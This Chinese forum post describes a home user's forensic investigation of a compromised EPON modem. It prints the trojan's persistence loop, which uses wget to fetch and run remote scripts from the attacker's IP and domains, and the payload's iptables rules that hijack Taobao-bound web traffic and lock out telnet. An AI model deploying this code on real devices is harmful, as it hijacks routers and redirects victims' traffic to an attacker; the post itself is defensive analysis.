C114门户论坛百科APPEN| 举报 切换到宽版

亚星游戏官网

 找回密码
 注册

只需一步,快速开始

短信验证,便捷登录

搜索

军衔等级:

亚星游戏官网-yaxin222  列兵

注册:2008-6-7
发表于 2015-12-30 20:47:05 |显示全部楼层
最近发现家里上网特别慢,经常打不开网页,排查两天发现是家里EPON的Modem(型号RG200O-CA)被黑了。


telnet进入Modem,检查系统文件,突然telnet中断,无法再telnet。断电重启,可以telnet进去,过一会儿还是telnet会中断。遂断开光纤,此时telnet正常,不再发生中断现象,初步判断telnet中断现象与上网状态有关。怀疑是Modem被木马感染。反复PS检查当前进程信息,突然发现一行可疑信息:


......
wget -q -P /tmp http://koudaiba.sinaapp.com start.sh

......



此前因为仔细研究过这台Modem,开启了路由功能,并成功编译上传了一个打印服务器的程序,对这个Modem的系统比较了解,从未出现过这样的信息,因此可以断定确实是Modem受到了感染。
经过搜索,上面的那行命令是通过/home/sh.sh启动的,查看/home/sh.sh内容如下:


# cd /home
# ls
sh.sh
# ls -l
-rw-r--r--    1 admin    root          466 Nov 23 07:26 sh.sh
# cat sh.sh
#!/bin/sh
while true
do
sleep 100
wget -q -P /tmp http://59.56.68.183:20011/start.sh || wget -q -P /tmp http://koudaiba.sinaapp.com/start.sh || wget -q -P /tmp http://abcdabcdabcdabcdabcd.com/start.sh && sh /tmp/start.sh && while true
do
wget -q -P /tmp http://59.56.68.183:20012/while.sh || wget -q -P /tmp http://koudaiba.sinaapp.com/while.sh || wget -q -P /tmp http://abcdabcdabcdabcdabcd.com/while.sh || sleep 43200 && sh /tmp/while.sh || sleep 43200
done
done




可以看到木马程序从两个网站下载shell脚本并反复循环实行,好吧,我也下载下来看看里面什么东东



#!/bin/sh
for ip in"140.205.140.188" "110.75.96.102" "106.39.164.154" "140.205.142.214" "140.205.135.67" "140.205.164.96" "140.205.250.86" "110.75.206.8" "140.205.140.76" "140.205.32.93" "140.205.243.65" "140.205.170.51" "140.205.134.199" "140.205.230.37" "140.205.250.42" "110.75.96.109";do
iptables -t nat -D PREROUTING -p tcp -d $ip --dport 80 -j DNAT --to-destination 59.56.68.183:20002
iptables -t nat -I PREROUTING -p tcp -d $ip --dport 80 -j DNAT --to-destination 59.56.68.183:20002
done
for ip in"120.24.0.0/14" "121.40.0.0/14" "119.28.0.0/15" "203.195.128.0/17" "115.28.0.0/15" "114.215.0.0/16" "120.55.0.0/16";do
iptables -t nat -D PREROUTING -p udp -d $ip --dport 53 -j DNAT --to-destination 114.114.114.114
iptables -t nat -I PREROUTING -p udp -d $ip --dport 53 -j DNAT --to-destination 114.114.114.114
done
iptables -D INPUT ! -s 59.61.121.0/24 -p tcp --dport 23 -j DROP
iptables -I INPUT ! -s 59.61.121.0/24 -p tcp --dport 23 -j DROP
sleep 86400

看到一串IP地址,后面又设置了防火墙规则。最后面的两条太显眼,就是只允许指定的网段能够telnet控制我的Modem,我之前的telnet中断现象就是它干的。

前面两条规则是把对上面那些IP TCP 80端口的访问数据全部转发到了59.56.68.18320002端口;
中间的两条规则是把对中间那段IP地址段的DNS访问全部转发到了114.114.114.114貌似这没有太大的危害。
那就再来看看一开始的哪些IP地址是谁的吧,随便找个IP地址试试:


C:\>telnet 140.205.140.188 80


HTTP/1.1 302 Found
Server: Tengine
Date: Sat, 26 Dec 2015 15:04:00 GMT
Content-Type: text/html
Content-Length: 258
Connection: close
Location: http://www.******.com/
Via: ad052071.et2[web,302]


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<h1>302 Found</h1>
<p>The requested resource resides temporarily under a different URI.</p>
<hr/>Powered by Tengine</body>
</html>



乖乖,居然是淘宝的IP,原来这个木马劫持了淘宝的IP,受害的用户不知不觉就连到了木马控制人的服务器上,真是吓死宝宝了。到百度一搜,那些IP地址大都是alibaba的。

而木马控制人的服务器IP59.56.68.183是福建某地的。

回头再来看看木马程序是如何启动的,查到/etc/有个rc_vtp2.0
-r-xr-xr-x    1 admin    root          545 Nov 23 07:26 rc_vtp2.0
看看它的内容:


# cat rc_vtp2.0
#!/bin/sh


mkdir /var/tmp/tftp
mkdir /var/config
mkdir /var/ctc


mkdir /var/net-snmp
mkdir /var/syslog


/usr/sbin/lightbox


# enhanced the logic unix/inet socket buffer and backlog
echo -n "max_dgram_qlen is changed from "
cat /proc/sys/net/unix/max_dgram_qlen > /dev/console
echo 100 > /proc/sys/net/unix/max_dgram_qlen
echo -n "to "
cat /proc/sys/net/unix/max_dgram_qlen > /dev/console
echo -n "change the socket recv buffer uplimit to 512k"
echo "524288" > /proc/sys/net/core/rmem_max


sleep 1


cm_logic&


sleep 1


syslogd &


sh /home/sh.sh&




在最后多了一句,之前的内容可能是原来就有的。
再看看rc_vtp2.0是在哪儿启动的,只在/etc/profile中有一句


......
/etc/rc_vtp2.0

......


这就奇怪了,按理/etc/profile只有在有人登录之后才会实行,是不是还有另外的地方启动呢?


先赶紧把这些木马文件干掉,回头继续查。

2015.12.26 23:19



举报本楼

本帖有 20 个回帖,您需要登录后才能浏览 登录 | 注册
您需要登录后才可以回帖 登录 | 注册 |

手机版|C114 ( 沪ICP备12002291号-1 )|联系大家 |网站地图  

GMT+8, 2024-11-12 11:21 , Processed in 0.512102 second(s), 15 queries , Gzip On.

Copyright © 1999-2023 C114 All Rights Reserved

Discuz Licensed

回顶部
XML 地图 | Sitemap 地图